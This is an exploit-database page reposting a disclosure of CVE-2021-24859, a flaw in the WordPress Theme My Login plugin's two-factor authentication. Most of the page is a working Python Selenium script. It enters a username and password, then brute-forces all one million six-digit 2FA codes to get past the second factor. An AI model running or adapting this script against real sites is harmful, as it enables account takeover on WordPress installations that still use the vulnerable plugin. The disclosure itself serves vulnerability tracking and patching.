Advertisement






WordPress Theme My Login 2FA Brute Force

CVE Category Price Severity
CVE-2021-24859 CWE-307 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-09-20
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090064

Below is a copy:

WordPress Theme My Login 2FA Brute Force
The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:

from typing import KeysView
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait 
from selenium.webdriver.support import expected_conditions as EC 

driver = webdriver.Firefox()
driver.get("websiteloginhere")

# Locate the username field by its 'id' attribute and fill it in 
username_field = driver.find_element(By.ID, "user_login") 
username_field.click() 
username_field.send_keys("usernamehere") 
 
# Locate the password field by its 'id' attribute and fill it in 
password_field = driver.find_element(By.ID, "user_pass") 
password_field.click() 
password_field.send_keys("passwordhere") 

# Locate the Log In button and click it 
login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") 
login_button.click() 

# FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting 
 
for i in range(1000000): 
 code = str(i).zfill(6) 
 
 try: 
 wait = WebDriverWait(driver, 10) 
 code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']"))) 
 except: 
 break 
 
 code_field.click() 
 code_field.clear() 
 code_field.send_keys(code) 
 
 verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") 
 verify_button.click()

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.